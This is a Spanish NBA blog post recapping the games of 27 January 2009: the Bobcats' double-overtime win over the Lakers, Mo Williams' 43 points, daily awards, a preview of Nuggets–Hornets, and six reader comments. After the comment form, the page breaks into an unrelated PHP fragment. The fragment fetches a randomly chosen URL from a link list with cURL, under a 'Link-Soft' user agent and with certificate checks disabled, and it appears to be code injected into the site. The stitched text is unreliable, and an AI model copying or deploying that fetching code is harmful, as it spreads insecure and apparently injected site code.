La crónica (27/1/2009)

28 de January de 2009 por TheDeerHunter

diawpaudrewEmpecemos por el final, por un partido que ha concluido pasadas las 7:30 de la mañana, hora peninsular, y que ha supuesto la sorpresa de la jornada: la victoria de los Bobcats en pista de los Lakers tras dos prórrogas. El partido estuvo dominado por los de Charlotte desde el inicio y todo parecía decantarse en su favor, con 7 arriba para los visitantes a 2:30 para el final. Pero 7 puntos de Kobe, 5 fallos en los tiros libres entre Bell y Diaw, y un triple de Fisher a falta de 13 segundos mandaron el partido a la prórroga. Entonces, los Lakers tomaron el mando con otros 10 puntos de Bryant, pero la eliminación por faltas de éste descompuso a los angelinos, que desde ese momento encajaron un 17-7 y en los que sólo Bynum fue capaz de sumar algún punto. Charlotte forzó una segunda prórroga e hizo justicia a su gran partido llevándose la victoria.

Ésta fue no sólo la mayor, sino también la única sorpresa de la noche. La victoria de los Cavs, sin embargo, también tuvo miga. James volvió a lograr un triple-doble pero el protagonista no fue él sino Mo Williams, autor de 43 puntos con 7 triples, 11 asistencias y 8 rebotes. Entre él y LeBron, 66 puntos, 23 rebotes y 22 asistencias. Aun así, los Kings plantaron cara en todo momento con un brillante Kevin Martin y un gran Salmons. Pero Brad Miller sigue pidiendo su traspaso a gritos en forma de penosas actuaciones.

Mucho más contundente fue la victoria de Orlando, que lograron más de 30 puntos en todos los cuartos ante los Pacers. Tras perderse 12 partidos por lesión, Michael Pietrus regresó para firmar su mejor actuación de la temporada y liderar la anotación de los de Florida. Granger, por el contrario, no tuvo su noche, como tampoco la tuvo su compañero Dunleavy.

En el partido a priori más igualado de la jornada los Spurs sacaron adelante, no sin ciertas dificultades, el siempre complicado asalto a Salt Lake City. En esta ocasión los locales jugaron casi con lo puesto, y más allá de los titulares apenas tienen nada para rascar. Duncan dio un clínic de baloncesto y Manu apareció en los momentos finales para anotar 10 puntos, incluyendo 8 tiros libres sin fallo.

Por último, los Nuggets le dieron una cruel bienvenida a Lionel Hollins como nuevo primer entrenador de Memphis. Marc contribuyó a la fiesta con un rosco en toda regla en el peor partido de su carrera en la NBA, sin duda, y completando probablemente la jornada más torpe que los Gasol Bros. han jugado en su vida ¿Tal vez anteanoche se fueron de fiesta juntos o algo?

PREMIOS

MVP: Tal vez Maurice Williams quiso mandar un recordatorio a los entrenadores que han de votar los suplentes del All-Star. A ellos van dedicados esos 43-11-8 y para Mo va el MVP de la jornada.

El rookie: Dado el escaso protagonismo de los novatos, a OJ Mayo le valió con anotar 19 puntos con buenos porcentajes y lograr además 2 rebotes, 2 asistencias, 2 robos y 2 tapones para llevarse el premio.

La sorpresa: Ni Dwight, ni Rashard, ni Turkoglu, ni Nelson. Tampoco Granger, ni Dunleavy, ni TJ Ford, ni Troy Murphy. El máximo anotador del partido entre Orlando e Indiana fue el francés Michael Pietrus, que anotó 27 puntos con 8 de 13 en tiros, cogió 10 rebotes y dio 4 asistencias.

La decepción: La pareja Granger & Dunleavy puede y ha de dar mucho más de sí que el 6 de 26 en tiros, 19 puntos, 4 rebotes y 6 asistencias que entre ambos sumaron anoche. Aunque si alguien nos decepcionó anoche fue Pau Gasol, por estadísticas (4 de 16, 7 rebotes, 1 asistencia, 0 tapones, 3 pérdidas) como por juego y actitud.

El mayor esfuerzo en vano: El dúo que forman Bryant & Bynum hizo todo lo posible para evitar el ridículo de los Lakers. 62 puntos con un excelente 25 de 42 en tiros, más 22 rebotes, 6 asistencias y 6 tapones sumaron entre ambos.

RAZONES PARA TRASNOCHAR

Como casi cada miércoles, la NBA vivirá una jornada de muchos partidos. En esta ocasión serán 12 los que se disputan, y entre todos ellos elegimos…

Nuggets @ Hornets. New Orleans ha de vencer a los Nuggets si no quieren verse superados por éstos en la clasificación. Denver llega liderado por Billups, que esta pasada noche ante los Grizzlies volvió a brillar pero al que le espera el reto más complicado al que se enfrenta cualquier base en la actualidad, un reto con nombre y apellido: Christopher Emmanuel Paul, alias CP3. Sin David West, ni Chandler, ni Carmelo, todas nuestras miradas estarán puestas, a partir de las 2:00 de la madrugada, en Paul y Billups. Y seguro que no nos decepcionan.

– El jugador al que recomendamos seguir esta noche es… José Manuel Calderón. Enfrente tendrá a Devin Harris pero, reconozcámoslo, también nos interesa ver si mantiene intacta su racha de tiros libres sin fallo. Está a 11 14 de igualar el récord histórico de Michael Williams.

Cerramos la crónica con la pregunta del día: Dice Tim Legler que los mejores triplistas de la NBA son Ray Allen, Dirk Nowitzki y Jason Kapono, en ese orden; ¿Estás de acuerdo?

Comenta

6 comentarios a esta entrada

  1. telekoman dice:
    #1

    Por lo que ponían en el periódico está sólo a 11, ya que en la pasada campaña los tres últimos los metió también.
    Vaya con los Gasol. no podían haber elegido otro momento.

      Citar

  2. MagicJohnson32 dice:
    #2

    Cierto, cierto, le faltan 11. Go, Calde, Go!!

    Buf, vaya derrota de los Lakers en su último partido en el Staples antes de la gran gira. Y qué asco da Raja Bell, por dioooooooooooosssssssssssssssss.

      Citar

  3. dunc dice:
    #3

    Yo si fuese calde me temblaría la mano que no podría ni abrocharme las zapatillas cada vez que fuese a la línea. Claro, que supongo que es por eso (entre millones de cosas mas) por lo que calde está ahi y yo echando pachangas los domingos…

    He leido por ahí que ofrecen a Marion a los Kings, estaría gracioso que se juntara con Kevin Martin para comparar quien de los 2 tira mas raro, madre mia, es increible lo que enchufa Kevin Martin tirando tan extraño como tira…

    Y en la lista de los tiradores me falta Redd

    Un saludo y a seguir como hasta ahora con el blog!

      Citar

  4. MagicJohnson32 dice:
    #4

    Gracias DUNC por los ánimos.

    Sí, Redd y Stojakovic ¿no?

    También suenan ahora los Blazers como equipo interesado en Salmons. A Rudy lo matarían, vaya.

      Citar

  5. telekoman dice:
    #5

    No por Dios, que dejen a Salmons en los Kings que ahí tiene carta blanca y me viene mejor para mi equipo. En Portland estaría por debajo de Roy y no haría los números que hace. Aparte de venirle mal a Rudy, por supuesto.

      Citar

  6. Llukas 70 dice:
    #6

    No se si alguien se ha enterado pero Marc y Rudy participaran los dos al partido de rookies. Una buena noticia para los nuestros y almenos tendre una excusa para ver el partido de los novatos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>